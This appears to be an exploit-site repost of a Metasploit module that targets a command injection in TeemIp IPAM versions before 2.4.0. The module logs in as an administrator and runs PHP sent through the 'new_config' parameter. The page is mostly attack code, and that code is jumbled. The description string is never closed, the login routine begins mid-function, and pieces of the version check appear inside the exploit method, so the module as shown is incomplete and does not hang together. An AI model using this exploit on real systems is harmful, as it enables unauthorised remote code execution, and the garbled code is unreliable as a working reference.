Exploits / Vulnerability Discovered : 2019-04-03 |
Type : remote |
Platform : php
This exploit / vulnerability Teemip ipam < 2.4.0 new_config command injection (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "TeemIp IPAM < 2.4.0 - 'new_config' Command Injection",
'Description' => %q(
This module exploits a command injection vulnerability in TeemIp
versions prior to 2.4.0. The "new_config" parameter of "exec.php"
allows you to create a new PHP file with the exception of config information.
The malicious PHP code sent is executed instantaneously and is not saved on the server.
The vulnerability can be exploited by an authorized user (Administrator).
Module allows remote command execution by sending php payload with parameter 'new_config'.
unless res
fail_with(Failure::Unreachable, 'Connection error occurred!')
end
if res.code == 200 && (res.body =~ /Logged in as/)
print_good("Authentication was successful")
@cookies = res.get_cookies
return
else
fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
end
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
##
# Exploitation process with prepared information
##
def exploit
unless Exploit::CheckCode::Appears == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
if res and res.code == 200 and res.body =~ /Identify yourself/
return do_login
else
transid = res.body.split('transaction_id" value="')[1].split('"')[0]
print_good("transaction_id : #{transid}")
end
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
if res.code == 200
version = res.body.split('iTop version ')[1].split('" src=')[0]
if version < '2.4.1'
print_status("#{peer} - Teemip Version is #{version}")
return Exploit::CheckCode::Appears
end
end
return Exploit::CheckCode::Safe
end
##
# End
##
end